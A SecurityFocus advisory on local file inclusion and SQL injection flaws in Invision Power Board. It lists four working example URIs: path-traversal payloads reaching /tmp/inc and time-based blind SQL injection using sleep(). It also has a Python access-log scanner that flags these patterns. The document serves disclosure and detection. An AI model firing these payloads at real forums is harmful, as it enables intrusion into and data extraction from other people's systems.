Invision Power Board Local File Include and SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/forum/index.php?app=core&module=global&section=register&any=?section=../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/inc

http://www.example.com/forum/index.php?app=core&module=global&section=register/register/page__section__../../../../../../../../../../../../../../../../../../../.././tmp/inc__

http://www.example.com/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20--%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd

http://www.example.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(16)%20--%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c
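One way to spot requests shaped like the example URIs above in a web server access log, as an added example that is not part of the original advisory: it flags `../` sequences in any query parameter and a non-numeric `starter` value. The log lines, the `classify` and `scan` helpers and the `PLACEHOLDER` auth_key are constructed for illustration, and the check assumes `starter` is meant to be an integer id.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: "starter" should only ever carry an integer id.
NUMERIC_PARAMS = {"starter"}
TRAVERSAL = re.compile(r"\.\.[/\\]")  # "../" or "..\" after one URL-decode
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(request_target):
    """Return sorted findings for one request path plus query string."""
    findings = set()
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # Check every parameter: the first example URI carries the
        # traversal in "any" (value "?section=../.."), not in "section".
        if TRAVERSAL.search(value):
            findings.add("traversal:" + name)
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d*", value):
            findings.add("non-numeric:" + name)
    return sorted(findings)

def scan(log_lines):
    """Return [(line_number, findings)] for access-log lines that match."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample log lines (shortened forms of the URIs on this page).
PREFIX = '198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET '
SUFFIX = ' HTTP/1.1" 200 512'
SAMPLE = [PREFIX + target + SUFFIX for target in (
    "/forum/index.php?app=core&module=global&section=register",
    "/forum/index.php?app=core&section=register&any=?section=../../../tmp/inc",
    "/forum/index.php?app=core&section=register/page__section__../.././tmp/inc__",
    "/forum/?act=mod&CODE=prune_move&starter=1%20AND%20sleep(15)%20--%20&auth_key=PLACEHOLDER",
)]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE):
        print(number, findings)
```

The check decodes each value once, so a double-encoded sequence such as `%252e%252e%252f` needs a second decode pass before matching.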


 

Copyright 2010, SecurityFocus